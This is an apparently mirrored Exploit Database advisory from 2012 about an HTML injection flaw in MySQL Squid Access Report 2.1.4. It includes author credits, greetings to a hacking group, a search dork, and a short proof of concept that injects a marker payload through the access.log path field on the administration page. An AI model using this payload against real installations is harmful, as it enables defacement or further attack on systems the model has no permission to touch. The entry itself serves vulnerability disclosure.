MySQL Squid Access Report 2.1.4 – HTML Injection

• Exploit Database
• 16 阅读

• 作者： Daniel Godoy
  日期： 2012-07-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20055/

• # Exploit Title: MySQL Squid Access Report 2.1.4 / HTML Injection#
  Date: 23/07/2012
  # Author: Daniel Godoy
  # Author Mail:DanielGodoy[at]GobiernoFederal[dot]com
  # Author Web: www.delincuentedigital.com.ar
  # Software web: http://sourceforge.net/projects/mysar/
  # Tested on: Linux# Dork: MySQL Squid Access Report 2.1.4
  # www.chap.cl
  # Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
  # be secured /stay secure
  # contacto@chap.cl 
  
  [Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
  Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorpher0, r0dr1 y demas user de RemoteExecution 
  www.remoteexecution.info www.remoteexcution.com.ar 
  #RemoteExecution Hacking Group 
  
  [PoC]
  find Squid's access.log file path and insert "> Example: ">PWNED!
  
  http://server/mysar/www/?a=administration
  
  -------------------------
  Correo enviado por medio de MailMonstruo - www.mailmonstruo.com